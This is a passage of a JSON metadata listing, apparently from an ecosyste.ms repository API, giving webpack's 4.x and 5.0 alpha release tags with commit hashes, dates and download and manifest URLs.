ebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag",